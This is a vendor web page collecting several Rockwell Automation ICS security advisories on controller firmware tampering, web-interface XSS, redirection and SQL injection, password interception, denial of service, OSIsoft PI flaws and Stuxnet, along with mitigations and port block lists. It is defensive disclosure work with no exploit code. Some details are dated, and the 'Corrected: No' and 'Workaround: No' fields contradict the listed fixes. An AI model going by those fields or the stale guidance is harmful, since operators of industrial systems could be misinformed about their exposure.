See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

Additional Links:

PN359 | PN359 | Firmware Upgrade Security Notice: Comment on DHS Communication (Control Systems Vulnerability in Multiple Sectors)
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
1756-L72, L73, L74, L75 , 1789 SoftLogi PC
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

Firmware Upgrade Security Notice: Comment on DHS Communication (Control Systems Vulnerability in Multiple Sectors)

Description

Rockwell Automation recognizes the importance of information and control system security to our customers. We are committed to working with government agencies and standards development organizations to develop solutions targeted to help our customers improve their overall system security strategy.

As part of this effort, the Idaho National Laboratory (INL) Control Systems Security Program, under contract to the Department of Homeland Security (DHS), identified a potential security concern within the firmware upgrade process used in control systems deployed in Critical Infrastructure and Key Resources (CIKR). DHS has confirmed that the firmware upgrade process can be intentionally manipulated in a manner that has potential to render the device inoperable and cause a disruption to the process and/or system operation.

Rockwell Automation has been working in partnership with DHS to identify potential short-term and long-term mitigation strategies.

As a result, Rockwell Automation is implementing a policy to digitally sign most firmware images and require contemporary devices to validate this signature before applying a firmware upgrade. Over time, many contemporary Rockwell Automation products will include this signature validation mechanism to help ensure firmware integrity and authenticity.

The following Rockwell Automation products currently authenticate firmware using digital signatures:

  • ControlLogix 1756-L72, L73, L74, L75 Programmable Automation Controllers
  • Virtual firmware of the 1789 SoftLogix PC based controllers

For other devices, to help reduce the likelihood of the upgrade process being exploited and help reduce associated security risk, Rockwell Automation and DHS recommend the following short-term mitigation strategies (Note: multiple strategies can be employed simultaneously):

  1. Disable where possible the capability to perform remote firmware upgrades over a network to a controller by placing the controller key switch into RUN mode. This prevents the Allen-Bradley brand controllers from accepting firmware upgrades.
  2. Restrict physical and electronic access to automation networks and systems to only those individuals authorized to be in contact with control system equipment and perform product firmware upgrades to that equipment.
  3. Restrict firmware upgrades to the local ControlNetwork or direct (point-to-point) physical methods only by physically or electronically isolating target devices from any larger system while performing a firmware upgrade.
  4. Temporarily remove unnecessary network connections to the device before administering a firmware upgrade. Reactivate device-specific security measures and replace network connections only after a successful firmware upgrade.
  5. Block all traffic to the EtherNet/IP or other CIP protocol based devices from outside the Manufacturing Zone by restricting or blocking access to TCP and UDP Port# 2222 and Port# 44818 using appropriate security technology (e.g. a firewall, UTM devices, or other security appliance).
  6. Employ layered security and defense-in-depth methods in system design to restrict and control access to individual products and ControlNetworks.

Rockwell Automation is currently investigating additional long-term mitigation strategies that include, but are not limited to:

  1. Additional techniques to verify the authenticity of firmware updates to help reduce the likelihood of file tampering.
  2. Enhancements to the joint Rockwell Automation / Cisco Plantwide Reference Architecture that detail methods and recommendations which can further strengthen control system security.

For more information and for assistance with assessing the state of security of your existing controls system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.

Reference http://www.ab.com/networks/architectures.html for comprehensive information about improving your control system to implement validated architectures designed to deliver layered-security and defense-in-depth.

KCS Status

Flagged - Formatting

PN391 | PN391 | ControlLogix 1756-ENBT/A Ethernet/IP Bridge - Potential Security Vulnerabilities
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
1756 ControlLogix I/O
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

Description

Potential Security Vulnerabilities

Rockwell Automation has identified three potential security vulnerabilities related to the web interface of the 1756-ENBT/A EtherNet/IP Bridge Module (the "Product"). Specifically, the risks include the following:

  • The potential for cross-site scripting, which could allow the Product to be used in a social engineering attack.

  • An attacker could potentially craft a URL that looked as if it would take a user to the Product, but would instead execute script from a different location. A successful attack would require the attacker to transmit the crafted URL to a user with access to the web interface of the Product and to convince that user to open the URL.

  • The potential for web redirection, which could allow the Product to be used in a social engineering attack.

  • An attacker could potentially craft a URL that looked as if it would take a user to the Product, but would actually direct the browser to a different location. A successful attack would require the attacker to transmit the crafted URL to a user with access to the web interface of the Product and to convince that user to open the URL.

  • The potential for exposure of some of the Product’s internal web page information. While this does not directly present a functional vulnerability, it does expose some internal information about the module.

Risk Mitigation

None of these issues results in the Product’s web pages or other Product functions being compromised or otherwise affected.

These potential security vulnerabilities are corrected in:

  • 1756-ENBT Version 4.008

  • 1756-EWEB Version 4.009

The best way to mitigate the risk associated with these issues is to employ the following in the design of network architecture:

  • Layered security.

  • Defense-in-depth methods.

Refer to http://www.ab.com/networks/architectures.html for comprehensive information about implementing validated architectures designed to deliver these measures.

Additionally, to help mitigate the risk associated with the cross-site scripting potential vulnerability, certain web browsers and/or browser add-ons can be used. Internet Explorer Version 8 (which is currently in beta release) has cross-site scripting protection built-in. Additionally, the NoScript add-on for the FireFox browser can help prevent cross-site scripting attacks.

For more information and for assistance with assessing the state of security of your existing controls system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security/.

REFERENCES

http://www.kb.cert.org/vuls/id/124059

http://www.kb.cert.org/vuls/id/619499

http://www.kb.cert.org/vuls/id/882619

Industry Advisory - CIP: Rockwell Automation ControlLogix 1756-ENBT/A WebServer Vulnerabilities

KCS Status

Released

Medium
PN402 | PN402 | ControlLogix 1756-ENBT/A EtherNet/IP Bridge - Potential Security Vulnerability
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
ControlLogix 1756-ENBT/A Ethernet/IP Bridge
CVSS Scores:
5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

ControlLogix 1756-ENBT/A EtherNet/IP Bridge - Potential Security Vulnerability

Description

Rockwell Automation has identified a potential security vulnerability in the firmware upgrade process employed by the ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module (the "Product"). Details of this potential vulnerability are as follows:

  • The potential for an unauthorized replacement of Rockwell Automation Product firmware with a corrupted firmware image that may render the Product inoperable and/or change its otherwise normal operation.

The results from an attacker’s successful exploitation of this vulnerability could include Denial of Service (DoS) to the Product and other components dependent on the Product. In an extreme case, successful exploitation could result in a potential misrepresentation of data or a repurposing of the Product for other malicious activities.

To help reduce the likelihood of exploitation and to help reduce associated security risk, Rockwell Automation recommends the following short-term mitigation strategies (Note: multiple strategies can be employed simultaneously):

  1. Employ layered security and defense-in-depth methods in system design to restrict and control access to individual products and ControlNetworks. Refer to Industrial Network Architectures for comprehensive information about implementing validated architectures designed to deliver these measures.
  2. Restrict physical and electronic access to automation products, networks and systems to only those individuals authorized to be in contact with control system equipment and perform product firmware upgrades to that equipment.
  3. Block all traffic to the EtherNet/IP or other CIP protocol based devices from outside the Manufacturing Zone by restricting or blocking access to TCP and UDP Port# 2222 and Port# 44818 using appropriate security technology (E.g. a firewall, UTM devices, or other security appliance).

In addition to these short-term mitigation strategies, Rockwell Automation continues our investigation and evaluation of other long-term mitigation strategies that include, but are not limited to:

  1. Product and system-level techniques and functional enhancements to verify the authenticity of firmware updates and help reduce the likelihood of file tampering.
  2. Enhancements to the joint Rockwell Automation / Cisco Plantwide Reference Architecture that detail methods and recommendations which can further strengthen control system security.

For your information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at https://www.rockwellautomation.com/global/capabilities/industrial-security/overview.page.

KCS Status

Released

Critical
PN560 | PN560 | Password Security Vulnerability in MicroLogix™ Controllers
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
MicroLogix Controllers
CVSS Scores:
10
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

Password Security Vulnerability in MicroLogix™ Controllers

Description

Password Security Vulnerability in MicroLogix™ Controllers

Issue date December 18, 2009. Updated September 27, 2011.

Rockwell Automation has identified a security vulnerability in the programming and configuration client software authentication mechanism employed by the MicroLogix™ family of programmable controllers. This vulnerability is known to affect the MicroLogix family of controller platforms, including catalog numbers: 1761-Lxxxxx, 1762-Lxxxxx, 1763-Lxxxxx, 1764-Lxxxxx, 1766-Lxxxxx (the "Product").

Vulnerability Details:

The potential exists for a highly skilled, unauthorized person with specific tools, know-how and access to the Product or the control system communication link, to intercept and decipher the Product’s password and potentially make unauthorized changes to the Product’s operation.

--- Update begins here ---

Vulnerability Mitigation

The password mechanism used between RSLogix 500 software and MicroLogix controllers (1761-Lxxxxx, 1762-Lxxxxx, 1763-Lxxxxx, 1764-Lxxxxx, 1766-Lxxxxx) has been enhanced to mitigate risks relating to this specific vulnerability. Concerned customers are encouraged to upgrade RSLogix 500 software to version 8.4 or greater.

--- Update ends here ---

In addition to the recommended software upgrade, Rockwell Automation recommends customers take additional steps as outlined below to further reduce associated security risk from this vulnerability. These same steps can also serve as a checklist to verify available security capabilities are in place in a system’s configuration too (Note: when possible, multiple strategies should be employed simultaneously):

  1. Restrict physical and electronic access to automation products, networks and systems to only those individuals authorized to be in contact with control system equipment.
  1. Employ layered security and defense-in-depth methods in system design to restrict and control access to individual products and ControlNetworks. Refer to http://www.ab.com/networks/architectures.html for comprehensive information about implementing validated architectures designed to deliver these measures.
  1. Block all traffic to the CSP, EtherNet/IP or other CIP protocol based devices from outside the Manufacturing Zone by restricting or blocking access to TCP and UDP Port# 2222 and Port# 44818 using appropriate security technology (e.g. a firewall, UTM devices, or other security appliance).
  1. Periodically and frequently change the Product’s password and obsolete previously used passwords to reduce exposure to threat from a Product password becoming known.

Rockwell Automation remains committed to making additional security enhancements to our products and systems in the future. For more information and for assistance with assessing the state of security of your existing controls system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.

KCS Status

Released

Critical
PN567 | PN567 | Client Software Authentication Security Vulnerability in PLC5® and SLC™ 5/0x Controllers
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
1747-L5x, 1785-Lx
CVSS Scores:
10
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

Description

Issued February 2, 2010. Updated March 3, 2010 - Version 1.2

Updated March 19, 2013 (see below)

Rockwell Automation has identified a potential security vulnerability in the programming and configuration client software authentication mechanism employed by certain versions of the PLC5 and SLC family of programmable controllers. The particular vulnerability affects older versions the following catalog numbers: 1785-Lx and 1747-L5x (the "Product"). Newer Products, programmed with current versions of RSLogix 5 or RSLogix 500, can enable specific security features like FactoryTalk Security services to effectively enhance security and reduce risks associated with this vulnerability. When coupled with contemporary network design practices, remaining risks linked to this vulnerability can be further reduced.

Details of this potential vulnerability to the affected Product are as follows:

The potential exists for a highly skilled, unauthorized person, with specific tools and know-how, to intercept communications between a Product and an authorized software client to gain access to the Product and interrupt its intended operation.

Customers who are concerned about unauthorized access to their Products can take immediate steps as outlined below to reduce associated security risk from this potential vulnerability. These same steps can also serve as a checklist to verify available security capabilities are in place in a system’s configuration too.

To help reduce the likelihood of exploitation and to help reduce associated security risk in the PLC5 and SLC family of controllers, Rockwell Automation recommends the following immediate mitigation strategies (Note: when possible, multiple strategies should be employed simultaneously):

1. When applicable, upgrade Product firmware to a version that includes enhanced security functionality compatible with Rockwell Automation’s FactoryTalk Security services. This functionality can be enabled via RSLogix 5 or RSLogix 500 software. Recommended firmware revisions are as follows:

a. The 1747-L5x firmware should be OS Series C FRN 10, or higher.

b. 1785-Lx processor firmware should be at or above the following (refer to included table):

Catalog Number

Series A

Series B

Series C

Series D

Series E

Series F

Enhanced

Revision

Revision

Revision

Revision

Revision

Revision

1785-L11B

R.2

U.2

L.2

K.2

1785-L20B

R.2

U.2

L.2

K.2

1785-L30B

S.2

U.2

L.2

K.2

1785-L40B

S.2

U.2

L.2

K.2

1785-L40L

S.2

U.2

L.2

K.2

1785-L60B

S.2

U.2

L.2

K.2

1785-L60L

S.2

U.2

L.2

K.2

1785-L80B

U.2

L.2

K.2

Protected

Revision

Revision

Revision

Revision

Revision

Revision

1785-L26B

R.2

U.2

L.2

K.2

1785-L46B

S.2

U.2

L.2

K.2

1785-L46L

S.2

U.2

1785-L86B

U.2

L.2

K.2

Ethernet

Revision

Revision

Revision

Revision

Revision

Revision

1785-L20E

U.2

L.2

K.2

A.2

1785-L40E

U.2

L.2

K.2

A.2

1785-L80E

U.2

L.2

K.2

A.2

ControlNet

Revision

Revision

Revision

Revision

Revision

Revision

1785-L20C15

U.2

L.2

K.2

E.2

1785-L40C15

U.2

L.2

K.2

E.2

1785-L46C15

K.2

E.2

1785-L60C15

L.2

1785-L80C15

L.2

K.2

E.2


2. Use the latest version of RSLogix 5 or RSLogix 500 configuration software and enable FactoryTalk Security services.

3. Disable where possible the capability to perform remote programming and configuration of the Product over a network to a controller by placing the controller’s key switch into RUN mode.

4. For PLC5 controllers, enable and configure "Passwords and Privileges" to restrict access to critical data and improve password security.

5. For SLC controllers, enable static protection via RSLogix 500 on all critical data table files to prevent any remote data changes to critical data.

<START UPDATE>

Added: 19 Mar 2013

Both RSLogix 500 and RSLogix Micro software version 8.40 were enhanced to introduce password encryption without any changes necessary to SLC and MicroLogix firmware. This implementation is compatible with all SLC and MicroLogix platforms.

In order to use this capability, a new "Encrypt Password" checkbox has been included in RSLogix 500/Micro version 8.40. This "Encrypt Password" checkbox is located on the Password tab of the Controller Properties page.

NOTE: Once an encrypted password is loaded into a controller, earlier versions of RSLogix 500 and RSLogix Micro will not be able to match the controller password.

For detailed information, refer to Publication 1766-RM001E-EN-P - May 2012, Program Password Protection

<END UPDATE>

6. Employ layered security and defense-in-depth methods in system design to restrict and control access to individual products and ControlNetworks. Refer to http://www.ab.com/networks/architectures.html for comprehensive information about implementing validated architectures designed to deliver these measures.

7. Block all traffic to the CSP, EtherNet/IP or other CIP protocol based devices from outside the Manufacturing Zone by restricting or blocking access to TCP and UDP Port# 2222 and Port# 44818 using appropriate security technology (e.g. a firewall, UTM devices, or other security appliance).

8. Restrict physical and electronic access to automation products, networks and systems to only those individuals authorized to be in contact with control system equipment.

Rockwell Automation is committed to making additional security enhancements to our systems in the future.

For more information and for assistance with assessing the state of security of your existing controls system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.

KCS Status

Released

PN676 | PN676 | FactoryTalk RnaUtility.dll Vulnerability
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
FactoryTalk Services Platform
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

FactoryTalk RnaUtility.dll Vulnerability

Description

Publicly disclosed September 13, 2011 as RSLogix 5000 Denial of Service Vulnerability

Updated October 5, 2011

This advisory is a replacement and update to AID#: 456065

On September 13, 2011, Rockwell Automation was made aware of a potential vulnerability in RSLogix™ 5000 software that if successfully exploited, may result in a Denial of Service condition. Since the release of this information, we have been evaluating the specific vulnerability and associated risk.

We have confirmed the existence of this vulnerability in a particular software service employed by RSLogix 5000 and FactoryTalk®-branded Rockwell Automation software products.

Affected Products:

Product Description

Affected Versions

RSLogix 5000 software

Versions V17, V18 and V19

All FactoryTalk-branded software

CPR9 and CPR9-SR1 through SR4


Vulnerability Details and Impacts:

The particular vulnerability affects a software service in Rockwell Automation’s FactoryTalk Services Platform (FTSP). Although the installation of FTSP is optional, the specific service is also employed separately with a variety of Rockwell Automation software applications.

The Rockwell Automation Security Taskforce has determined that exploitation of this vulnerability can result in a potential Denial of Service (DoS) in RSLogix 5000 software. Specifically, it can result in RSLogix 5000 being unable to publish information to FactoryTalk Diagnostics and FactoryTalk AssetCentre. Additionally, exploitation can lead to a potential for a DoS and Denial of View (DoV) condition to other affected FactoryTalk-branded software. Such DoS and DoV conditions can prevent affected software from establishing communication or maintaining information exchange with servers and other control system devices.

There is no known possibility of malicious code injection and no known escalation of privilege on the target machine that results from successful exploitation of the vulnerability. Furthermore, there is no indication that exploitation will disrupt operation of a Rockwell Automation programmable controller or communications between RSLogix 5000 software and a Rockwell Automation programmable controller.

Vulnerability Mitigation:

A software patch for affected FactoryTalk Services Platform and RSLogix 5000 software has been released. Rockwell Automation recommends concerned customers apply this patch roll-up at their earliest convenience:

Recommended
Mitigation

Product Description

Current Version

Recommendations

FactoryTalk Services Platform (FTSP)

CPR9, CPR9-SR1, CPR9-SR2,
CPR9-SR3, CPR9-SR4

Apply patch roll-up:

AID#458689

http://rockwellautomation.custhelp.com/app/answers/detail/a_id/458689

RSLogix 5000

V17, V18, V19

NOTE: FactoryTalk Services Platform CPR7 and earlier and RSLogix 5000 V16 and earlier are not affected by this vulnerability.

Other Mitigation Techniques:

We recognize the concerns our customers have relating to this matter. We continue to recommend that concerned customers remain vigilant and follow good security practices and system design.

Rockwell Automation, in collaboration with NitroSecurity, has released a specific SNORT® signature suitable for many popular Intrusion Detection Systems (IDS). Use of this signature can help further reduce risk of successful remote exploitation of this vulnerability. This signature has been supplied to the QuickDraw SCADA IDS project, originally funded by US Department of Energy, for inclusion in the QuickDraw signature database. http://www.digitalbond.com/tools/quickdraw/

Rockwell Automation has evaluated Symantec Endpoint Protection (SEP) and validated a rule that blocks the known exploitation for SEP. We recommend that SEP definitions be kept up to date. For more information, refer to: http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=24527

In addition, the following security strategies are some techniques that will help reduce risk and enhance overall control system security:

1. Employ layered security and defense-in-depth methods in system design to restrict and control access to individual products and ControlNetworks. Refer to http://www.ab.com/networks/architectures.html for comprehensive information about implementing validated architectures designed to deliver these measures.

2. Restrict physical and electronic access to automation products, networks and systems to only those individuals authorized to be in contact with control system equipment and perform product firmware upgrades to that equipment.

3. Configure firewall ingress/egress rules to block the following TCP ports to prevent traversal of RNA messages into/out of the ICS system:

1330

1331

1332

4241

4242

4445

4446

5241

6543

9111

60093

49281

4. Evaluate firewall configurations to ensure other appropriate traffic is blocked.

5. Use antivirus/antimalware and endpoint security solutions and verify security definitions for are kept up to date.

For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security

KCS Status

Released

Critical
PN889 | PN889 | FT Historian SE OSIsoft PI Data Archive Vulnerabilities
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
Products:
FactoryTalk Historian SE
CVSS Scores:
10
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

FT Historian SE OSIsoft PI Data Archive Vulnerabilities

Description

October 1st, 2015 - Version 1.0

On August 13th 2015, the Rockwell Automation Security Taskforce became aware of an advisory published by ICS-CERT (ICSA-15-225-01), which stated that OSIsoft disclosed and resolved 56 security vulnerabilities in their PI Server 2015 release. In addition to PI Server 2015, OSIsoft has also released PI Server 2012 SP1, which includes a subset of the vulnerabilities fixed in the 2015 version. OSIsoft is strongly recommending that users upgrade to the PI Server 2015 release.

FactoryTalk Historian SE includes the OSI PI Server 2012 product, including the PI Data Archive component, in the standard product image. As part of this process, Rockwell Automation has investigated the reported vulnerabilities, and has concluded that FT Historian SE customers are likely vulnerable to these same set of vulnerabilities as the PI Server product. At the time of publication, no known public exploits exist at this time for these vulnerabilities.

Details relating to these vulnerabilities, the known affected platforms and recommended mitigations are contained herein.

AFFECTED PRODUCTS

  • FactoryTalk Historian SE (9518-HSEx), Versions 2.00.00, 2.10.00, 2.20.00, 3.01.00 and 4.00.00

Rockwell Automation is continuing to investigate these vulnerabilities and is actively determining future plans to address them, including incorporating the updated OSI PI Server into FactoryTalk Historian Server. This advisory will be updated when these plans are determined, as well as when updated software is available for customers to upgrade their systems. We recommend that customers apply the mitigations detailed below and subscribe to this article to receive the abovementioned notifications when updated.

VULNERABILITY DETAILS

According to both the ICS-CERT and OSIsoft disclosures, a portion of highest-severity vulnerabilities may allow a remote code injection by an attacker who sends a specially crafted sequence of packets to the PI Server contained in FT Historian SE.

To be successful, the attacker must have network connectivity to reach the server running FT Historian SE and be able to access port 5450 on that system. A successful exploit would allow an attacker to gain full privileges on the Windows system. With this level of access, an attacker could tamper with the system or product binaries, read and write arbitrary data, and/or tamper with user accounts on the system.

According to these disclosures, these vulnerabilities can also be used to create a Denial-of-Service (DoS) condition on the target server, rendering the FT Historian SE server unavailable to the automation system, and potentially cause either loss or corruption of the PI Server data.

RISK MITIGATIONS

  • Limit access to PI Server Port 5450, which reduces exposure to the highest-rated vulnerabilities.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  • Subscribe to our Security Advisory Index, Knowledgebase article KB:54102 (https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html), so you have access to our most up-to-date information about security matters that affect Rockwell Automation products.

ADDITIONAL LINKS

KCS Status

Released

Critical
PN893 | PN893 | MicroLogix 1100 and 1400 Controller Vulnerabilities
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
CVE IDs:
CVE-2015-6492, CVE-2015-6491, CVE-2015-6490, CVE-2015-6486, CVE-2015-6488
Products:
MicroLogix 1100 and 1400 controller
CVSS Scores:
7.5, 3.7, 9.8, 4.6, 4.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

MicroLogix 1100 and 1400 Controller Vulnerabilities

Description

Version 2.0 - December 8th 2015 (Original Release: October 27th 2015)

From June through October 2015, Rockwell Automation was notified of security vulnerabilities discovered in the Allen-Bradley MicroLogix 1100 and/or MicroLogix 1400 product families. One of these notifications was the security vulnerability (KB731427) previously disclosed during DEFCON 23 in August 2015.

As part of this process, Rockwell Automation expanded the scope of its evaluation beyond the MicroLogix platform in order to determine if this same threat-vector has the potential to affect other Rockwell Automation product platforms. Rockwell Automation has reproduced all of these vulnerabilities in both the MicroLogix 1100 and MicroLogix 1400 product families. Due to the breadth of platforms potentially affected, Rockwell Automation has been conducting thorough evaluations to ensure completeness in its risk assessment and mitigation process.

Details relating to these vulnerabilities, the known affected platforms and recommended countermeasures are contained herein.

AFFECTED PRODUCTS

  • 1766-L32BWA, 1766-L32AWA, 1766-L32BXB, 1766-L32BWAA, 1766-L32AWAA, 1766-L32BXBA, Version 15.003 and earlier.
  • 1763-L16AWA, 1763-L16BWA, 1763-L16BBB, 1763-L16DWD, Version 14.000 and earlier.

VULNERABILITY DETAILS

Vulnerability #1: Remote Code Execution through Stack-based Buffer Overflow

A Remote Code Execution ("RCE") condition may result when an affected product receives a specific malicious web request. An attacker could exploit this vulnerability to inject and execute arbitrary code on the product. Receipt of such a message from an unintended or unauthorized source has the potential to cause loss of product availability and/or compromise the product’s integrity and confidentiality. The impact to the user’s automation system would be highly dependent on both the type of malicious code included in this attack and the mitigations that the user may already employ.

This vulnerability applies to both the MicroLogix 1100 and MicroLogix 1400 platforms. However, at this time a fix is only available for the MicroLogix 1100 product family. A future product update for the MicroLogix 1400 will be available in the November 2015 timeframe, and will include this vulnerability fix. Rockwell Automation will update this advisory at the time of the release.

03-DEC-2015 UPDATE: Version 15.004 is now available for the MicroLogix 1400 product. See below for more details.

CVE-2015-6490 has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Vulnerability #2: Product Denial of Service

A Denial of Service ("DoS") condition may result on the MicroLogix 1100/1400 when an affected product receives a specific malicious web request, which would require user action to power cycle the product and restore it to a working state. Receipt of such a message from an unintended or unauthorized source has the potential to cause loss of product availability. The impact to the user’s automation system would be highly dependent on the mitigations that the user may already employ.

CVE-2015-6492 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability #3: Remote File Inclusion

A Remote File Inclusion condition may result on the MicroLogix 1100/1400 when an attacker crafts a malicious link, using the built-in feature to "redirect" outside web content into the product’s web page frame. This outside web content could contain malicious content that would target the unsuspecting user’s web browser when the content is rendered. The impact to the user’s automation system would be highly dependent on both the type of web exploits included in this attack and the mitigations that the user may already employ.

A successful attack would not compromise the integrity of the device or allow access to confidential information contained on it. On rare occasions the availability of the device may be affected if used in a large-scale phishing campaign. Vulnerable devices would effectively be a trusted host, used to unknowingly deliver potentially malicious content because of this vulnerability.

This vulnerability was first disclosed in publication KB731427 and ICS-ALERT-15-225-02A in August 2015.

CVE-2015-6491 has been assigned to this vulnerability. A CVSS v3 base score of 4.6 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)

Vulnerability #4: Stored Cross-site Scripting ("XSS")

Ilya Karpov of Positive Technologies identified a XSS vulnerability in both the MicroLogix 1100/1400. This vulnerability may allow an attacker to execute requests inject and store Javascript in the product’s web server, which would be executed on the user’s web browser when accessing the embedded web server function. The stored Javascript may be used to unknowingly execute web requests in the context of the user who is viewing the page. A factory reset is required to remove the stored Javascript.

CVE-2015-6488 has been assigned to this vulnerability. A CVSS v3 base score of 4.7 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N)

Vulnerability #5: Privilege Escalation through Structured Query Language ("SQL") Injection

Ilya Karpov of Positive Technologies has identified a Privilege Escalation vulnerability in the MicroLogix 1100/1400. Privilege Escalation may result when an attacker tricks an authorized user (through social engineering/phishing) to click on a specific and malicious link, which allows the attacker to create or escalate the privileges of an existing user to the administrative level. An authorized administrator is required to undo the changes made after the attack.

CVE-2015-6486 has been assigned to this vulnerability. A CVSS v3 base score of 3.7 has been assigned; the CVSS vector string is (AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L)

For additional information on CVSS v3 metrics, vectors, and scores, please see the First’s Common Vulnerability Scoring System Version 3.0.

RISK MITIGATIONS
Rockwell Automation recommends that asset owners evaluate the impact with each of these vulnerabilities within their environment, and apply the following suggested mitigations which are applicable.

  1. Update supported products based on this table:

    Product Family Catalog Numbers Hardware Series Vulnerabilities Fixed Suggested Actions
    MicroLogix 1100 1763-L16AWA
    1763-L16BBB
    1763-L16BWA
    1763-L16DWD    		 Series B 1, 2, 3, 4, and 5

    - Apply FRN 15.000 (Downloads)

    - Apply the additional mitigations described below
    MicroLogix 1100 1763-L16AWA
    1763-L16BBB
    1763-L16BWA
    1763-L16DWD
    		 Series A None - Apply the mitigations described below
    MicroLogix 1400 1766-L32AWA
    1766-L32AWAA
    1766-L32BWA
    1766-L32BWAA
    1766-L32BXB
    1766-L32BXBA
    		 Series B 1, 2, 3, 4, and 5.

    - Apply FRN 15.004(Downloads)

    - Apply the additional mitigations described below
    MicroLogix 1400 1766-L32AWA
    1766-L32AWAA
    1766-LK32BWA
    1766-L32BWAA
    1766-L32BXB
    1766-L32BXBA
    		 Series A None - Apply the mitigations described below

  2. Disable the web server on the MicroLogix 1100 and 1400, as it is enabled by default. See KB732398 for detailed instructions on disabling the web server for each controller platform.
  3. Set the keyswitch to RUN to prohibit re-enabling of the web server via RSLogix 500.
  4. Use trusted software, software patches, anti-virus / anti-malware programs and interact only with trusted web sites and attachments.
  5. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  6. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  7. Locate control system networks and devices behind firewalls, and isolate them from the business network.
  8. When remote access is required, use secure methods, such as Virtual Private Networks ("VPNs"), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  9. Subscribe to our Security Advisory Index, Knowledgebase article KB:54102 (https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html), so you have access to our most up-to-date information about security matters that affect Rockwell Automation products.

LINKS

KCS Status

Released

PN900 | PN900 | Rockwell Automation recommended mitigations for Zero day vulnerability (W32.Stuxnet) to Microsoft® Windows™
Published Date:
February 11, 2020
Last Updated:
February 11, 2020
CVE IDs:
CVE-2010-2568
Products:
RSLinx Classic (Single Node
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Introduction

Rockwell Automation recommended mitigations for Zero day vulnerability (W32.Stuxnet) to Microsoft® Windows™

Description

Rockwell Automation recommended mitigations for Zero day vulnerability (W32.Stuxnet) to Microsoft® Windows™

Released: 21 July 2010 Updated: 10 August 2010

Multiple credible sources disclosed that in the days and months prior to 14 July 2010 a series of cyber events occurred that took advantage of a previously unknown Windows™ vulnerability and delivered a specially crafted payload of malware that targeted industrial control systems, SCADA/critical infrastructure processes specifically. Technical details and a patch for the Windows vulnerability used during these events have been released by Microsoft in the recently updated Microsoft Security Advisory (2286198) v2.0 dated 2 August 2010. The specific malware, commonly known as W32.Stuxnet, has been analyzed by numerous antivirus vendors and is a known threat Windows®-based systems.

